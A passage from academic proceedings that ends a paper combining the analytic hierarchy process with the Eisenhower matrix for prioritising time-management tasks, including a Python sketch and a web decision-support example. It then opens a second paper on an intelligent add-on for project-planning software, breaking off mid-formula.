By default, the parameter Q is 0.25, because there are 4 equivalent criteria (Q = 1/4 = 0.25), but the value of this parameter can be changed within [0.25; 1) to raise the lower threshold for the inclusion of alternatives in a certain class of tasks $C_i$ (corresponding to a square of the Eisenhower matrix), $i = 1, 2, 3, 4$. With the calculated weights, the priority tasks for execution are selected in each square of the Eisenhower matrix, which, in turn, gives an understanding of the importance of each task within the corresponding class.

Formally, using the described procedure, the set of alternatives $A = \{a_1, a_2, \ldots, a_n\}$ is divided into classes of tasks of the form

$$C_i = \left\{ a_1^{(i)}, a_2^{(i)}, \ldots, a_{s_i}^{(i)} \right\}, \quad i = 1, \ldots, 4,$$

so that

$$A = \bigcup_{i=1}^{4} C_i, \quad C_i \cap C_j = \emptyset,\ i \ne j,\ i, j = 1, \ldots, 4,$$

where $a_j^{(i)} \in A$, $w\big(a_j^{(i)}\big) \ge Q$, $j = 1, \ldots, s_i$, $\sum_{i=1}^{4} s_i = n$, and $w\big(a_j^{(i)}\big)$ is the priority value of the alternative $a_j^{(i)}$ in the priority vector $W^{(i)}$ of the matrix of paired comparisons of alternatives by criterion $k_i$, $i = 1, \ldots, 4$.

The above procedure allows tasks in the Eisenhower matrix to be classified more accurately, and their priorities to be determined, which facilitates the work of the DM in the distribution of time management tasks. Let us consider in more detail the main stages of the proposed combined method for solving the time management problem.

Stage 0. Set $Q = 0.25$, $C_i = \emptyset$, $i = \overline{1,4}$. This value can be changed on the interval [0.25; 1) to raise the lower threshold for the inclusion of alternatives in a certain class of tasks $C_i$.

Stage 1. Compare the alternatives (tasks) from the set A by criterion $k_1$ – "important-urgent tasks" – using the analytic hierarchy process and analyze them for inclusion in the class of tasks $C_1$ according to the procedure below.

Step 1. Fill in the square matrix of pairwise comparisons M in terms of the dominance of one alternative (task) over the others on the Saaty scale, i.e. dominance is expressed by integers on a nine-point scale or by the numbers inverse to them. The square matrix of pairwise comparisons M is filled in according to the following rule. If alternative $a_i$ dominates alternative $a_j$, where $i \ne j$, then the matrix cell corresponding to row $a_i$ and column $a_j$ is filled with the integer $a_{ij}$, and the cell corresponding to row $a_j$ and column $a_i$ is filled with the inverse number $1/a_{ij}$. If, on the contrary, alternative $a_j$ dominates alternative $a_i$, then the integer $a_{ji}$ is placed in the cell corresponding to row $a_j$ and column $a_i$, and the fraction $1/a_{ji}$ is placed in the cell corresponding to
row $a_i$ and column $a_j$. If the alternatives $a_i$ and $a_j$ are equivalent, then the symmetric cells of the matrix contain 1.

To obtain a matrix of pairwise comparisons, the DM or an expert makes $n(n-1)/2$ estimates (here n is the dimension of the matrix of pairwise comparisons). As a result, the matrix M is obtained:

$$M = \begin{pmatrix} 1 & a_{12} & \cdots & a_{1n} \\ 1/a_{12} & 1 & \cdots & a_{2n} \\ \cdots & \cdots & \cdots & \cdots \\ 1/a_{1n} & 1/a_{2n} & \cdots & 1 \end{pmatrix}$$

Set $M_{k_1} = M$.

Step 2. The ranking of the alternatives (tasks) by priority, analyzed using the matrix of pairwise comparisons, is based on the analysis of the principal eigenvector of the matrix of pairwise comparisons. The principal eigenvector provides the ordering of alternatives by priority, and the eigenvalue is a measure of the consistency of the expert's judgments. The principal eigenvector W of the positive square matrix M is calculated from the matrix equation

$$MW = \lambda_{\max} W,$$

where $W = (w_1, w_2, \ldots, w_n)^T$ is the principal eigenvector of the matrix M, corresponding to $\lambda_{\max}$, the maximum eigenvalue of the matrix M among its eigenvalues, i.e. the numbers $\lambda$ that are the roots of the characteristic equation

$$\det(M - \lambda E) = 0,$$

where E is the identity matrix.

If the eigenvector W is normalized (the sum of its elements is 1), then it is the priority vector for the matrix M. If the eigenvector W is not normalized, it must be normalized. To do this, the sum of all its elements is found and a new vector W′ is formed, whose elements are the ratios of the elements of W to the found sum:

$$W' = \left(w_i'\right)_{i=\overline{1,n}}, \quad w_i' = \frac{w_i}{\sum_{i=1}^{n} w_i}.$$
Let the normalized priority vector of alternatives (tasks), found according to the described procedure of paired comparisons by criterion $k_1$, be

$$W^{(1)} = \left(w_i^{(1)}\right)_{i=\overline{1,n}}.$$

Step 3. Using the analytic hierarchy process, for the matrix of paired comparisons M the consistency of the expert's assessment is evaluated based on the indicator CR, the consistency ratio of the matrix of paired comparisons M, which shows how consistent the expert's judgments about the compared objects are:

$$CR = CI / M(CI),$$
where
• $CI = (\lambda_{\max} - n)/(n - 1)$ is the consistency index of the matrix of paired comparisons, n is the number of elements compared with each other, and $\lambda_{\max}$ is the maximum eigenvalue of the matrix of paired comparisons M;
• $M(CI)$ is the average value (expected value) of the consistency index of a randomly composed inversely symmetric matrix of pairwise comparisons on a scale from 1 to 9 (with the corresponding inverse values of the elements), based on experimental data (Table 1).
Table 1. The average value of the consistency index M(CI)

Dimension | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8
M(CI) | 0.00 | 0.00 | 0.58 | 0.90 | 1.12 | 1.24 | 1.32 | 1.41

Dimension | 9 | 10 | 11 | 12 | 13 | 14 | 15
M(CI) | 1.45 | 1.49 | 1.51 | 1.48 | 1.56 | 1.57 | 1.59
The value of CR is considered acceptable if it does not exceed 0.1. Therefore, if CR ≤ 0.1, the matrix of paired comparisons M is considered consistent, and there is a transition to Step 4. Otherwise, the matrix of paired comparisons M is considered inconsistent, and the expert must return to Step 1 and repeat the comparison procedure.

Step 4. For each alternative $a_i$, $i = \overline{1,n}$, the value of its priority $w_i^{(1)}$ is analyzed. If the corresponding value $w_i^{(1)} \ge Q$, then the alternative $a_i$ falls into the class of tasks $C_1$ with priority $w_i^{(1)}$, i.e. $C_1 = C_1 \cup \{a_i\}$, and is removed from further analysis by the other criteria: $A = A \setminus \{a_i\}$. Otherwise, alternative $a_i$ remains in the set of alternatives (tasks) A for further comparison by the next criterion $k_2$.

As a result of this procedure, the following objects are obtained:
• $M_{k_1}$ – the consistent matrix of pairwise comparisons of alternatives from the set A;
• $W^{(1)} = (w_i^{(1)})_{i=\overline{1,n}}$ – the normalized priority vector of alternatives (tasks) by criterion $k_1$;
• $C_1 = \{a_1^{(1)}, a_2^{(1)}, \ldots, a_{s_1}^{(1)}\}$ – the class of tasks by criterion $k_1$, i.e. those for which $w_i^{(1)} \ge Q$, $i = \overline{1,s_1}$;
• $A_1 = A \setminus C_1$ – the set of alternatives (tasks) not included in the class of tasks $C_1$.

Stage 2. Compare the alternatives from the set $A_1$ by criterion $k_2$ – "important-non-urgent tasks" – and analyze them for inclusion in the class of tasks $C_2$ according to a procedure similar to that described in Stage 1. As a result, the following objects are obtained:
• $M_{k_2}$ – the consistent matrix of pairwise comparisons of alternatives from the set $A_1 = A \setminus C_1$;
• $W^{(2)} = (w_i^{(2)})_{i=\overline{1,n_1}}$ – the normalized priority vector of alternatives (tasks) by criterion $k_2$, where $n_1$ is the number of alternatives (tasks) remaining in the set $A_1$;
• $C_2 = \{a_1^{(2)}, a_2^{(2)}, \ldots, a_{s_2}^{(2)}\}$ – the class of tasks by criterion $k_2$, i.e. those for which $w_i^{(2)} \ge Q$, $i = \overline{1,s_2}$;
• $A_2 = A_1 \setminus C_2$ – the set of alternatives (tasks) not included in the classes of tasks $C_1$ and $C_2$.

Stage 3. Compare the alternatives from the set $A_2$ by criterion $k_3$ – "unimportant-urgent tasks" – and analyze them for inclusion in the class of tasks $C_3$ according to a procedure similar to that described in Stage 1. As a result, the following objects are obtained:
• $M_{k_3}$ – the consistent matrix of pairwise comparisons of alternatives from the set $A_2$;
• $W^{(3)} = (w_i^{(3)})_{i=\overline{1,n_2}}$ – the normalized priority vector of alternatives (tasks) by criterion $k_3$, where $n_2$ is the number of alternatives (tasks) remaining in the set $A_2$;
• $C_3 = \{a_1^{(3)}, a_2^{(3)}, \ldots, a_{s_3}^{(3)}\}$ – the class of tasks by criterion $k_3$, i.e. those for which $w_i^{(3)} \ge Q$, $i = \overline{1,s_3}$;
• $A_3 = A_2 \setminus C_3$ – the set of alternatives (tasks) not included in the classes of tasks $C_1$, $C_2$ and $C_3$.

Stage 4. If only one task remains in the set $A_3$, it automatically falls into the category $k_4$ – "unimportant-non-urgent tasks", i.e. into the class of tasks $C_4$. If more than one task remains in the set $A_3$, then the alternatives from the set $A_3$ are compared by criterion $k_4$ – "unimportant-non-urgent tasks" – following Steps 1, 2 and 3, and all of them are included in the class of tasks $C_4$. As a result, the following objects are obtained:
• if the number of tasks in the set $A_3$ is more than one: $M_{k_4}$ – the consistent matrix of pairwise comparisons of alternatives from the set $A_3$; $W^{(4)} = (w_i^{(4)})_{i=\overline{1,n_3}}$ – the normalized priority vector of alternatives (tasks) by criterion $k_4$, where $n_3$ is the number of alternatives (tasks) remaining in the set $A_3$;
• $C_4 = \{a_1^{(4)}, a_2^{(4)}, \ldots, a_{s_4}^{(4)}\}$ – the class of tasks by criterion $k_4$.

The result of this procedure is the division of the set of alternatives (tasks) A into the classes of alternatives (tasks) $C_1$, $C_2$, $C_3$, $C_4$, corresponding to the specified criteria $k_1$, $k_2$, $k_3$, $k_4$; at the same time, for each task $a_j^{(i)}$ of each class the priority value $w_j^{(i)} \ge Q$ is known. The following describes the software implementation of this method as part of the decision support system developed by the authors.
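Before turning to that implementation, here is a compact illustrative sketch of the whole combined procedure (Python with NumPy, not the authors' PHP/JavaScript code). The `compare` argument is a hypothetical callback supplying the expert's Saaty-scale pairwise-comparison matrix for a given criterion; everything else follows Stages 0–4 and Steps 1–4 above.

```python
import numpy as np

# Average consistency index M(CI) for matrix dimensions 1..15 (Table 1).
M_CI = {1: 0.0, 2: 0.0, 3: 0.58, 4: 0.90, 5: 1.12, 6: 1.24, 7: 1.32,
        8: 1.41, 9: 1.45, 10: 1.49, 11: 1.51, 12: 1.48, 13: 1.56,
        14: 1.57, 15: 1.59}

def priorities(M):
    """Normalized principal eigenvector of a pairwise-comparison matrix
    and its consistency ratio CR = CI / M(CI)."""
    M = np.asarray(M, dtype=float)
    n = M.shape[0]
    if n == 1:
        return np.array([1.0]), 0.0
    vals, vecs = np.linalg.eig(M)
    top = np.argmax(vals.real)
    w = np.abs(vecs[:, top].real)
    w = w / w.sum()
    ci = (vals[top].real - n) / (n - 1)
    cr = ci / M_CI[n] if M_CI[n] > 0 else 0.0
    return w, cr

def classify(tasks, compare, Q=0.25):
    """Stages 1-4: sift tasks into the four Eisenhower classes.
    `compare(tasks, k)` is a hypothetical callback returning the expert's
    Saaty-scale pairwise-comparison matrix for criterion k."""
    classes = {1: [], 2: [], 3: [], 4: []}
    remaining = list(tasks)
    for k in (1, 2, 3):
        if not remaining:
            return classes
        w, cr = priorities(compare(remaining, k))
        if cr > 0.1:
            raise ValueError("inconsistent judgements, re-elicit the matrix")
        keep = []
        for task, weight in zip(remaining, w):
            if weight >= Q:
                classes[k].append((task, weight))  # enters class C_k
            else:
                keep.append(task)
        remaining = keep
    # Whatever is left falls into C4; the paper optionally ranks these
    # by one more round of comparisons under criterion k4.
    classes[4] = [(t, None) for t in remaining]
    return classes
```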
3 Experiments

Most of the well-known decision support systems use the analytic hierarchy process as a theoretical basis for decision-making in a wide variety of situations, from intergovernmental management to sectoral and private issues in business, industry, healthcare and education. These include, for example, the systems "Expert Choice" [21], "Super Decisions" [22] and "Decision Lens" [23].

A decision support system (DSS) is an interactive computer-automated system (software package) designed to help and support various human activities in making decisions regarding the solution of ill-structured or unstructured problems [17].
The users of DSS are usually managers or staff members (e.g. a financial planner) of an enterprise, IT company, firm, institution, etc. A staff member can use the system for his/her own purposes, or serve as an intermediary (i.e., a system operator) for the manager. People can play different roles in the decision-making process. The person who actually chooses the best course of action is called the decision maker (DM). In addition to DM, other people are involved in the decision-making process: the owner of the problem, experts, analysts and active groups. In addition, the DM environment, employees of the organization on whose behalf the DM makes decisions, are implicitly involved in decision-making [18]. The concept of interactivity is key and is based on the position that at each stage of the decision-making process, the DSS should provide the DM with the necessary and sufficient information, presented in the right form and available at any time and in any place where the Internet is available [17]. This can be achieved by creating a web-oriented system [18]. An example of structural implementation of such a system is shown in Fig. 2.
Fig. 2. Structural implementation of web-oriented system
For the software implementation of the proposed method for solving the problem of classifying time management tasks, which combines the analytic hierarchy process and the Eisenhower matrix method, the authors created a web-oriented resource that is an integral part of the DSS “Decisioner” [24]. To develop this resource, programming languages and technologies shown in Fig. 3 are used.
Fig. 3. Logos of programming languages and implementation technologies in the project
In the developed DSS, PHP is used to query the MySQL database; this language also distributes access among users depending on their role. JavaScript without frameworks is used to implement the decision-making methods. For the JavaScript and PHP code to interact with the user, standard HTML5 and CSS3 tools were chosen for the visual design.

The input data of the decision-making task solved with the AHP are:

• The goal: a brief description of the task that constitutes the first level of the hierarchy. The goal in this context often begins with words such as: plan, distribute tasks, etc. For example: plan a working day, distribute tasks by degrees of importance.
• Criteria: a quantitative or qualitative characteristic that is essential for judging an object (alternative). In the case of the Eisenhower matrix, the number of criteria should be 4, according to the names of the quadrants. The criteria form the second level of the hierarchy.
• Alternatives: the objects to choose from, in our case the input tasks for planning. The alternatives form the third level of the hierarchy. In the DSS "Decisioner" the DM can specify from 4 to 15 alternatives. The reason for this limitation is that the table of random consistency index values for the consistency index (CI) in the AHP contains values only up to matrices of dimension 15 [19].

Consider an example where the necessary time management tasks are entered as alternatives using the web interface of the DSS "Decisioner" (Fig. 4), while the criteria are entered automatically in accordance with the Eisenhower matrix method [1].

At each stage of pairwise comparisons by the analytic hierarchy process, the consistency of the expert's assessments is calculated automatically (see Stage 1, Step 3). Accordingly, a field was created to notify the user of the value of the consistency ratio (CR). In the case of acceptable consistency of the estimates, this field displays the following message: "The comparison matrix is consistent because CR ≤ 0.1. Estimates do not need to be clarified" (Fig. 5). Otherwise, the user receives the following message: "The comparison matrix is badly consistent because CR > 0.1. Comparison estimates should be changed" (Fig. 6).

Since the criteria in the task are equivalent, they are not compared. Therefore, at the next step, the alternatives are compared according to criterion $k_1$ – important-urgent tasks. An example of comparing input tasks according to this class is shown in Fig. 7.

According to the results of comparing the tasks with each other by the criterion "Important-urgent tasks", these tasks were "Add a module for the program" and "Test the new module", because their weights $w(a_j^{(1)}) \ge Q = 0.25$. Accordingly, these tasks are not included in the following comparisons. With the help of the calculated weights, priority tasks are highlighted for execution in each Eisenhower square, which, in turn, gives an understanding of the importance of the tasks. In this case, the task "Add a module for the program" has a higher priority ($w(a_1^{(1)}) = 0.3566$) in implementation than the task "Test the new module" ($w(a_2^{(1)}) = 0.2774$), so its execution comes first.
Fig. 4. Input data for the task of time management in DSS “Decisioner”
Fig. 5. Example of notifying the user about good consistency of estimates
Fig. 6. Example of notifying the user about poor consistency of estimates
At the next step, the remaining alternatives are compared according to criterion $k_2$ – "important-non-urgent tasks" (Fig. 8).
Fig. 7. Comparison of alternatives to criterion k 1 using DSS “Decisioner”
According to the results of comparing the tasks with each other by the criterion "Important-non-urgent tasks", the tasks with appropriate weights were "Update the version of the program on the site" ($w(a_1^{(2)}) = 0.4464$) and "Create own blog" ($w(a_2^{(2)}) = 0.2706$).

At the next step, the remaining alternatives are compared according to criterion $k_3$ – unimportant-urgent tasks (Fig. 9). According to the results of comparing the tasks with each other by the criterion "Unimportant-urgent tasks", the tasks with appropriate weights were "Share articles in chat" ($w(a_1^{(3)}) = 0.5638$) and "Reply to emails" ($w(a_2^{(3)}) = 0.2634$).
Fig. 8. Comparison of alternatives by criterion k 2
Fig. 9. Comparison of alternatives by criterion k 3
Accordingly, two tasks remain in the list. In the case when only one task remains at a certain step, it automatically falls into the last category of tasks $k_4$ – unimportant-non-urgent tasks. In the case when more than one task remains, it is possible not to compare the tasks according to the $k_4$ criterion and to leave the matrix filled with ones, or the DM may compare these tasks to determine their priority in the execution sequence (Fig. 10).
Fig. 10. Comparison of alternatives by criterion k 4
With the help of the calculated weights, the priority tasks to be performed in the Eisenhower square "Unimportant-non-urgent tasks" are identified, which, in turn, gives an understanding of the importance of the tasks. In this case, the task "Watch the video course about design" has a higher priority ($w(a_1^{(4)}) = 0.8$) in implementation than the task "Sort mail spam" ($w(a_2^{(4)}) = 0.2$), so its execution comes first.
4 Results

With the help of the created web resource, the user (DM, expert) enters the list of necessary tasks as alternatives into the offered template, while the criteria from the set K are already entered into the template according to the Eisenhower matrix method. Then, after the stage-by-stage filling of the matrices of comparisons of alternatives for the corresponding criteria, the user receives the completed Eisenhower matrix indicating the priority of the tasks in each class (Fig. 11).
Fig. 11. Filled Eisenhower matrix using the DSS “Decisioner”
5 Discussion

The research proposes a new method for solving the problem of classifying time management tasks, which combines the analytic hierarchy process and the Eisenhower matrix method. Through this combined method, the user is given the opportunity to evaluate tasks as alternatives according to criteria corresponding to the classification of tasks in the Eisenhower matrix. As a result, the input tasks are divided into the four classes of the Eisenhower matrix, and the priorities of the tasks of each class are determined in numerical form. As a recommendation for decision-making, the sequence of tasks obtained in accordance with their importance and priority is given.

The advantages of the proposed method include the ability to automate the process of distributing tasks according to the criteria of importance, as well as obtaining numerical weight values of the task priorities. The disadvantages of this method include the additional time spent by the user on pairwise comparisons of tasks according to the AHP. However, with the help of information technologies, this process is partially automated, which significantly speeds it up and makes it expedient.
6 Conclusions

As a result of the research, a combined method has been proposed for classifying time management tasks that joins the analytic hierarchy process and the Eisenhower matrix method, and a module for a web-oriented decision support system has been created that provides online automation of the process of classifying input tasks for the Eisenhower matrix according to degrees of importance and priority of execution. The obtained experimental results confirm the expediency of using the authors' approach to the classification of time management tasks, which uses a combination of the Eisenhower matrix method and the analytic hierarchy process.

The proposed method should be used when numerical calculations are needed to confirm the result of task analysis, or when it is necessary to analyze relatively equivalent tasks whose order of implementation must be mathematically justified.

Prospects for further scientific research on the topic of the article are associated with the application of the analytic hierarchy process to solving classification problems, in particular in the field of project management. Accordingly, it is necessary to adapt the proposed combined method for more than 4 criteria and more than 15 alternatives, and to investigate the process of selecting the parameter Q and the influence of the weights of the criteria in case of their inequality. There are also plans to supplement the functionality of the "Decisioner" web resource with the possibility of group expertise, with aggregation of the assessments of several experts.
Information Technology in Intelligent Computing
Development of the Concept of Intelligent Add-On over Project Planning Instruments Iurii Teslia1 , Oleksii Yegorchenkov2 , Iulia Khlevna2 , Nataliia Yegorchenkova3 , Yevheniia Kataeva1 , Andrii Khlevny2 , and Ganna Klevanna1(B) 1 Cherkasy State Technological University, Cherkasy, Ukraine
[email protected] 2 Taras Shevchenko National University of Kyiv, Kyiv, Ukraine 3 Slovak Technical University in Bratislava, Bratislava, Slovak Republic
Abstract. The necessity of intellectualization of project planning processes is shown. The principles and tasks of intellectualization of the project planning process are formulated. The concept of intelligent add-on over project management software tools is proposed, which includes the principles, approach, structure, model and tools of project planning. Stages and tasks of project planning with the use of intelligent add-on are highlighted. The structure of intelligent project planning technology has been developed. It is proposed to use a modified reflex method to implement an intelligent add-on to MS Project or Oracle Primavera P6 tools. The model of development of reactions to the flow of input data on the project plan in the intelligent add-on is proposed. The developed concept and means of the intelligent add-on have passed experimental and practical testing on real projects and shown their effectiveness in project planning. Keywords: Project planning · software add-ons · artificial intelligence systems · reflective intelligent systems
1 Introduction
Project planning is impossible without the use of software tools such as MS Project, Oracle Primavera P6, Clarizen, etc. Modern software calculates network graphs, builds Gantt charts, allocates resources depending on the time of project implementation, etc. But most of these tools implement formal algorithms, leaving the solution of intelligent problems to humans. This places significant demands on the professionalism of the managers and specialists engaged in planning. It is no secret that most projects do not end according to the original work plan. And the reason for this is not only poor performance; the reason is also bad planning. Such planning does not take into account previous experience, current project conditions, human resources, the reliability of suppliers, etc. To address these shortcomings, it is necessary to use modern artificial intelligence systems that would take on the task of analyzing previous project management experience, could interact with users in natural language, and could assess the capabilities of project participants and various threats. But there is a problem.
If you create such an intelligent system with all the functions that are traditionally implemented by software tools, and supplement them with intelligent modules, the cost of developing such an integrated system will be too high for individual companies. And the absence of such tools on the project management software market suggests that this is too difficult a task even for companies such as Microsoft Corporation or Oracle Corporation. The problem can be solved in the following way. Since planning software tools are already available, it is necessary to use their functions to create an intelligent software and information add-on over them [1, 2]. It will use the information of these tools, supplement it with information on the results of planning by managers in previous projects and information on the work of human resources and suppliers in previous projects, perform intelligent analysis of these data, generate a realistic work plan and transmit it to the same software tools. Such an intelligent add-on, solving the problem of information support of project planning software tools, would interact with managers with the help of voice commands, make decisions on the duration and relationships of works, and give recommendations on resource allocation in project management. Many of the smart features that need to be implemented in such an add-on have already been implemented elsewhere. In particular, natural language interfaces have entered human life and are used by many well-known companies [3]. They are used in the driving of cars [4] and wheelchairs [5], and in the control of smartphones and other technical devices [6]. In addition, systems that understand speech are introduced into robotic production environments [7] and into the functioning of smart cities [8]. But the intellectualization of the project planning process requires not only a natural language interface, but also the ability to solve creative problems. There are some developments on solving local intelligent problems such as decision support and data mining. Thus, in the works [9–11], the prospects of integrating artificial intelligence technologies into project management are presented. A number of works are devoted to the use of expert systems in the management of enterprises and business environments [12–15, 19]. But their scope does not intersect with the tasks of project planning, so it is impossible to apply them in this area. In general, it can be stated that today there are no functionally complete intelligent project planning systems. And there are no intelligent add-ons to project planning software tools that fully solve the creative tasks of project management: determining the relationships between project works, allocating resources and estimating the time required to complete each work, and assessing the risks of and opportunities for implementing the project. Therefore, there is an unrealized area of research in the field of project management information technology. This work is devoted to the issue of creating a concept for the development of an intelligent add-on over project planning tools. The aim of the work is to develop the concept of an intelligent add-on over project planning tools. To achieve this goal, it is necessary to solve the following tasks: to formulate the principles and tasks of intellectualization of the project planning process, to develop the structure of the intelligent project planning technology, and to propose tools for its implementation.
2 Materials and Methods
The object of research in the paper is the processes of project planning. The subject of research is an intelligent add-on over project management software tools. The result of the research should be the concept of an intelligent add-on over project management software tools. The creation of such a concept should be based on certain approaches and principles of its construction.

2.1 Approach and Principles of Creating an Intelligent Add-On over Project Planning Software Tools
At the heart of any concept should be the approach and principles that determine the vision of its scope, the mechanisms and tools for its implementation, and its place in the subject area. It is clear that the intelligent add-on is part of the project planning system. Therefore, its creation should be performed using the ideas and methods of a systems approach. From the point of view of building a functional system within the project planning processes, the following functions can be distinguished:
1. Forming a task to develop a project plan.
2. Collection and analysis of information to develop a project plan.
3. Development of the calendar-network schedule (CNS).
4. Calculation of the calendar-network schedule.
5. Alignment of the project plan.
6. Approval of the project plan.
The implementation of the above functions of the project planning system will rely on the following principles:
1. The principle of improvement. The result of using the intelligent add-on is an increase in the professionalism of the process and in the accuracy of the project planning result. This will be achieved through the use of the company's information standard, which influences the choice of decisions on the current project based on what decisions were made in previous projects and what the actual result was, as well as through the intellectualization of the planning process.
2. The principle of entry. The intelligent add-on is part of the company's project planning system and will take into account the existing tools used in project teams.
3. The principle of addition. The intelligent add-on should complement existing project planning tools rather than replace the functions that are already implemented in them.
4. The principle of convenience. The intelligent add-on should include a user-friendly intelligent interface with the project team. Regardless of their level of computer education (even if it is low), managers must be able to communicate their vision of the project to the intelligent add-on and receive answers in a convenient and understandable way.
5. The principle of systematicity. The intelligent add-on is part of the organizational and technical system of project management. Therefore, it must take into account the
technological requirements and features of the implementation of such a system and be able to exchange information with its other components. Following the formulated principles, we can correctly determine the tasks that will be solved in the intelligent add-on.

2.2 Stages and Tasks of Project Planning Using an Intelligent Add-On
The purpose of any planning system is to coordinate actions to address project objectives, both in terms of product formation and in terms of ensuring the formation of the project product [17]. To achieve this goal, the project planning system must: obtain information from managers to calculate the plan; use the information standard of a project-oriented company; take into account previous experience in planning and implementing project plans; be able to integrate and analyze data obtained from project managers and the information standard in order to highlight the most reliable information; calculate the project plan; bring the project plan to the executors; and make changes to the project plan if it is not implemented. These functions must be implemented both in project management software tools and in the intelligent add-on. To implement them, the intelligent add-on over the project management tools must solve the following problems:
1. Process and analyze information from managers and specialists (mostly in natural language), documentation (formalized and natural), and the information standard of the company (formalized), and generate an array of data (by calculating decisions on the project plan) to calculate the calendar-network schedule.
2. Learn to plan.
3. Administer the process of aligning and approving the project plan.
4. Evaluate performance through monitoring decisions.
5. Correct the decisions.
Based on these tasks, the project planning technology, which will be based on software tools, information standard tools and intelligent add-ons over them, can be represented by the structure shown in Fig. 1. Within the framework of the given project planning technology there are six main stages:
1. Preparation of information for planning.
2. Development of a plan.
3. Evaluation of the plan.
4. Approval of the plan.
5. Performance evaluation.
6. Adjustment of the plan upon execution.
These stages will be implemented in three components:
1. Intelligent add-on.
2. Information standard.
3. Project management software tools.
Moreover, stage 1 is implemented both in the information standard of the company and in the intelligent add-on. Stages 3, 4 and 5 are implemented only in the intelligent add-on, and stages 2 and 6 in the software tools for project management. Based on this, the intelligent add-on should implement tools that can be used to develop the calendar-network schedule, evaluate the calculated plan and its implementation, and monitor the administrative procedures for its agreement and approval. Consider the tools that will solve these problems.
Fig. 1. The structure of project planning technology based on an intelligent add-on over software tools
2.3 Tools for Implementing Intelligent Project Planning Technology
The tasks listed in Sect. 2.2 are usually solved using various methods and means of artificial intelligence. In particular:
1. Communication with a person on the topic of creating and calculating a calendar-network schedule in natural language – methods of computational linguistics.
2. Training the intelligent add-on – machine learning.
3. Information analysis – statistical and cybernetic methods of data mining.
4. Making decisions on the project plan, evaluating, adjusting and administering them – the tools of decision support systems (DSS).
Creating an intelligent add-on that combines these tools is a very difficult task, and the cost of such an add-on would be very high. After all, the tasks that need to be solved in the intelligent add-on differ in terms of functional implementation and information content. This excludes the possibility of creating a single core for their solution, either on the basis of a neural network or with the use of knowledge bases.
But in Subsect. 2.2 it has been shown that the planning system can be divided into 3 main components: project management tools, the intelligent add-on, and the information standard. Accordingly, we need to integrate 3 key tools into a single system. Previous experience in the development of project management information technology allows us to propose the following tools: MS Project (project management toolkit) and PrimaDoc (for maintaining the information standard) [2]. But to create an intelligent add-on, it is proposed to use the ideas of creating reflective intelligent systems [18], in particular the system of reflex action identification in project planning systems [16]. The main feature of this system is the ability to simultaneously process different types of input data from separate sources as a single input stream, producing reflexes to arbitrary combinations of elements of this data, which is most suitable for processing the incoming data flow from managers, formalized and natural information from project documents, statistical information from the information standard, and regulatory information on project implementation. Consider the problem of developing a response to the flow of arbitrary input data in the solution of intelligent problems.

2.4 Development of Reactions to the Flow of Input Data According to the Project Plan in the Intelligent Add-On
By the reaction of the intelligent add-on we will understand the output data flow which corresponds to the task and which will contain information about the project plan:
1. Project tasks.
2. The sequence of project tasks.
3. Parameters of project tasks (time, costs, volume).
4. Resources for project tasks and their scope.
The reaction of the intelligent add-on is influenced by the following factors:
1. The content of information from experts (managers and specialists of the project team), which is usually provided as natural language text. The content is a factor influencing the reaction of the intelligent add-on.
2. Documentation on the project (design and estimate documentation, design and technological documentation, the product backlog, etc.), which is presented both in formal form (usually tables) and in natural language form. Elements of the documentation are also factors influencing the response of the intelligent add-on.
3. Data from the information standard, reflecting the progress of planning and implementation of the company's projects in the past.
The response of an intelligent system cannot be described as a deterministic function, because there are always alternative solutions for project planning, which depend, inter alia, on random influences. Moreover, the result of a decision made on the basis of the reactions of the intelligent add-on can be assessed only after its implementation, and even then, depending on the other decisions made. In real conditions, such an assessment can only be given by the project team that is responsible for its outcome. Therefore, the evaluation of the reaction will be represented by an estimate of the probability that the team approves the managerial decisions that correspond to the reaction of the
intelligent add-on. If n factors are taken into account when solving the problem τ_i, then for each reaction R_j we have a conditional probability

\forall R_j, F_1^{\tau_i} F_2^{\tau_i} F_3^{\tau_i} \; \exists \, u(R_j / F_1^{\tau_i} F_2^{\tau_i} F_3^{\tau_i}),   (1)

where R_j is the reaction of the intelligent add-on; F_1^{\tau_i} are the factors influencing the response of the intelligent add-on in solving the problem τ_i related to the information provided by the experts (the project team); F_2^{\tau_i} are the factors influencing the response of the intelligent add-on in solving the problem τ_i related to the project documentation; F_3^{\tau_i} are the factors influencing the reaction of the intelligent add-on in solving the problem τ_i which are formed by data from the information standard; u(R_j / F_1^{\tau_i} F_2^{\tau_i} F_3^{\tau_i}) is the estimate that the reaction R_j will be accepted by the project team if the decision is due to the influence of the factors F_1^{\tau_i} F_2^{\tau_i} F_3^{\tau_i}. The decisive rule for the choice of the reaction in the intelligent add-on is

R_j: \; \max_j u(R_j / F_1^{\tau_i} F_2^{\tau_i} F_3^{\tau_i}).   (2)
To solve this problem, it is necessary to relate the factors to the reactions through numerical values that characterize the magnitude of the impact of each factor on each of the reactions. This value may be based on the deviation of the probability of the reaction in the presence of a factor from the conditional probability of the reaction in its absence. Thus, for the factor f_{kl} ∈ F_k^{\tau_i}, the influence on the solution of the problem τ_i is determined by the difference between p(R_j / f_{kl}^{\tau_i}) and p(R_j / \bar{f}_{kl}^{\tau_i}):

i_{kj} = \omega\big(p(R_j / f_{kl}^{\tau_i}), \, p(R_j / \bar{f}_{kl}^{\tau_i})\big),   (3)

where i_{kj} is the magnitude of the influence of the factor f_{kl}^{\tau_i} on the solution of the problem τ_i; ω is the function determining the magnitude of the impact; \bar{f}_{kl}^{\tau_i} denotes the absence of the factor f_{kl}^{\tau_i} when solving the problem τ_i. Formulas (2) and (3) define the rule: if the decision is influenced by factor A, it is probably necessary to produce reaction B, which is very close to the rules and mechanisms of reflexes in the living world. Therefore, the intelligent add-on will also need to produce reflexes to various input factors. The teacher will have to indicate how he would react to this or that input information. The intelligent add-on itself must learn to identify the key factors that determine a reaction. To calculate the magnitude of the influence of many factors and to choose the response that will meet the objectives of the project and be accepted by the project team, it is proposed to use the reflex method [18]. But for this it must be adapted to the tasks at hand. After all, the intelligent add-on will consider all the factors, including those related to the input documentation and the information standard, and not only those that correspond to the appeals of the project management team members to the add-on. Therefore, we will make changes to the reflex method [18] taking into account the problem that will
be solved by an intelligent add-on using managerial information, documentation and the information standard.
1. The magnitude of the influence of the factor f_{kl}^{\tau_i} on the reaction R_j in solving the problem τ_i, provided 0 < p(R_j / f_{kl}^{\tau_i}) < 1 and 0 < p(R_j / \bar{f}_{kl}^{\tau_i}) < 1, is

